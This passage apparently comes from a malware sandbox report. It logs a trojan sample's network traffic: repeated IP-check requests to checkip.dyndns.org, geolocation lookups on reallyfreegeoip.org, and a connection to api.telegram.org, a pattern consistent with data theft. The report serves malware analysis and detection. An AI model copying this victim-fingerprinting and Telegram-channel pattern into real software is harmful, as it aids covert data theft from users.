                                              Sep 25, 2024 21:54:31.894761086 CEST4972180192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:31.902209044 CEST8049721193.122.6.168192.168.2.7
                                              Sep 25, 2024 21:54:31.902322054 CEST4972180192.168.2.7193.122.6.168
                                              Sep 25, 2024 21:54:31.904587984 CEST49723443192.168.2.7149.154.167.220
                                              Sep 25, 2024 21:54:31.904634953 CEST44349723149.154.167.220192.168.2.7
                                              Sep 25, 2024 21:54:31.904709101 CEST49723443192.168.2.7149.154.167.220
                                              Sep 25, 2024 21:54:31.905103922 CEST49723443192.168.2.7149.154.167.220
                                              Sep 25, 2024 21:54:31.905117989 CEST44349723149.154.167.220192.168.2.7
                                              Sep 25, 2024 21:54:32.553936958 CEST44349723149.154.167.220192.168.2.7
                                              Sep 25, 2024 21:54:32.554145098 CEST49723443192.168.2.7149.154.167.220
                                              Sep 25, 2024 21:54:32.555808067 CEST49723443192.168.2.7149.154.167.220
                                              Sep 25, 2024 21:54:32.555828094 CEST44349723149.154.167.220192.168.2.7
                                              Sep 25, 2024 21:54:32.556180954 CEST44349723149.154.167.220192.168.2.7
                                              Sep 25, 2024 21:54:32.557873964 CEST49723443192.168.2.7149.154.167.220
                                              Sep 25, 2024 21:54:32.603405952 CEST44349723149.154.167.220192.168.2.7
                                              Sep 25, 2024 21:54:32.797548056 CEST44349723149.154.167.220192.168.2.7
                                              Sep 25, 2024 21:54:32.797629118 CEST44349723149.154.167.220192.168.2.7
                                              Sep 25, 2024 21:54:32.797725916 CEST49723443192.168.2.7149.154.167.220
                                              Sep 25, 2024 21:54:32.802014112 CEST49723443192.168.2.7149.154.167.220
                                              Sep 25, 2024 21:54:47.246373892 CEST4970880192.168.2.7193.122.6.168
                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 25, 2024 21:54:11.786007881 CEST5794753192.168.2.71.1.1.1
                                              Sep 25, 2024 21:54:19.796638966 CEST5401453192.168.2.71.1.1.1
                                              Sep 25, 2024 21:54:19.804934025 CEST53540141.1.1.1192.168.2.7
                                              Sep 25, 2024 21:54:21.012043953 CEST5594653192.168.2.71.1.1.1
                                              Sep 25, 2024 21:54:21.020836115 CEST53559461.1.1.1192.168.2.7
                                              Sep 25, 2024 21:54:31.893029928 CEST5996653192.168.2.71.1.1.1
                                              Sep 25, 2024 21:54:31.902935028 CEST53599661.1.1.1192.168.2.7
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 25, 2024 21:54:11.786007881 CEST192.168.2.71.1.1.10x6f05Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                              Sep 25, 2024 21:54:19.796638966 CEST192.168.2.71.1.1.10x4bcfStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Sep 25, 2024 21:54:21.012043953 CEST192.168.2.71.1.1.10xcb80Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Sep 25, 2024 21:54:31.893029928 CEST192.168.2.71.1.1.10xed43Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 25, 2024 21:54:11.794054985 CEST1.1.1.1192.168.2.70x6f05No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 21:54:19.804934025 CEST1.1.1.1192.168.2.70x4bcfNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2024 21:54:19.804934025 CEST1.1.1.1192.168.2.70x4bcfNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Sep 25, 2024 21:54:19.804934025 CEST1.1.1.1192.168.2.70x4bcfNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Sep 25, 2024 21:54:19.804934025 CEST1.1.1.1192.168.2.70x4bcfNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Sep 25, 2024 21:54:19.804934025 CEST1.1.1.1192.168.2.70x4bcfNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Sep 25, 2024 21:54:19.804934025 CEST1.1.1.1192.168.2.70x4bcfNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Sep 25, 2024 21:54:21.020836115 CEST1.1.1.1192.168.2.70xcb80No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Sep 25, 2024 21:54:21.020836115 CEST1.1.1.1192.168.2.70xcb80No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Sep 25, 2024 21:54:31.902935028 CEST1.1.1.1192.168.2.70xed43No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                              • reallyfreegeoip.org
                                              • api.telegram.org
                                              • checkip.dyndns.org
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.749703193.122.6.168807600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 21:54:19.816318035 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 25, 2024 21:54:20.751400948 CEST320INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 035103d8a947690295354535ff37dfe3
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 25, 2024 21:54:20.755733967 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 25, 2024 21:54:20.968812943 CEST320INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:20 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 3a0db541cd244583f5b2365b387ec372
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Sep 25, 2024 21:54:21.729464054 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 25, 2024 21:54:22.004311085 CEST320INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: ce3407c94d4da8ef28cc31d592694d47
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.749708193.122.6.168807600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 21:54:22.626214981 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Sep 25, 2024 21:54:23.499480963 CEST320INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: a64b2b212a25b3780f45fe7a02679b24
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.749711193.122.6.168807600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 21:54:24.140626907 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 25, 2024 21:54:24.776884079 CEST320INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 63d1afdc023e8222205ac281be0d82fc
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.749713193.122.6.168807600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 21:54:25.403053045 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 25, 2024 21:54:26.040602922 CEST320INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 545b1eb107295c99312e359946840579
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.749715193.122.6.168807600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 21:54:26.674101114 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 25, 2024 21:54:27.474567890 CEST320INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:27 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 5758825cf5560ea2b45571b27d6748f3
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.749717193.122.6.168807600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 21:54:28.125169039 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 25, 2024 21:54:28.756685972 CEST320INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: f96db00dad8063612596ebbaf091ddb5
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.749719193.122.6.168807600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 21:54:29.356527090 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 25, 2024 21:54:30.004937887 CEST320INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:29 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8080de224a3b8cb5c7d2d5905eaa0fbc
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.749721193.122.6.168807600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 21:54:30.609955072 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Sep 25, 2024 21:54:31.239100933 CEST320INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:31 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 01c31a311cf4f635ee76985150e38b12
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.749705188.114.97.34437600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-25 19:54:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-25 19:54:21 UTC678INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:21 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 46120
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2BZRqU0xegnBsamYPWhe%2BFbKI5XD0hZOs%2F9mQe4ksf8gYHSfyy6v8BLe6T8fBrZoi3fngf%2BDjYmzTVw2rPyRmCSq6JIymf4myKp78aoMdwkstEQKPtz3sU6j1NkolaS4B3a0uro4"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8d90cd5988c334-EWR
                                              2024-09-25 19:54:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-25 19:54:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.749706188.114.97.34437600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-25 19:54:22 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-25 19:54:22 UTC676INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:22 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 46121
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Z2sT11qEhzXEuI%2BZMZkP3o4nEOaNmRRLsvnPM7JCble9DvkYtsBCcaL%2BN7IrwSN0nPo1ybdNs898a2hoUdulqbl2KlWTJeYw255SzdnIHnlkY%2FuIEpl4wLV2flK5ZRphuL5kk4n"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8d90d2f84f0f71-EWR
                                              2024-09-25 19:54:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-25 19:54:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.749709188.114.97.34437600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-25 19:54:23 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-25 19:54:24 UTC678INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:24 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 46123
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GBx4gctr7Vm451O6kAC4aZjC3Opgqxkay4%2F0zy7tEt8gC7LROme4nnVgf%2FidT%2FHGX2ynSwYSvzXYOqudyzHksr4U1A5KcEeVVbRGR%2BngI9Tydc2CMVtKa8oER3J4o0wPXTX3trD5"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8d90dc69404406-EWR
                                              2024-09-25 19:54:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-25 19:54:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.749712188.114.97.34437600C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-25 19:54:25 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-25 19:54:25 UTC680INHTTP/1.1 200 OK
                                              Date: Wed, 25 Sep 2024 19:54:25 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 46124
                                              Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0WfwhHeqGi4ybPTzhquR0VW9JJjgwRJjc7gk%2FbtA5wScTrGTypKnvaGMC5Nr25G7xT%2Fc538oI%2F3HzV1Mp7tUgVUxVhaVIV1oL6S%2FTnMLQxV%2FW42zU3v6I0S0eNKSk1gNqpoIeLe"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c8d90e459dc4302-EWR
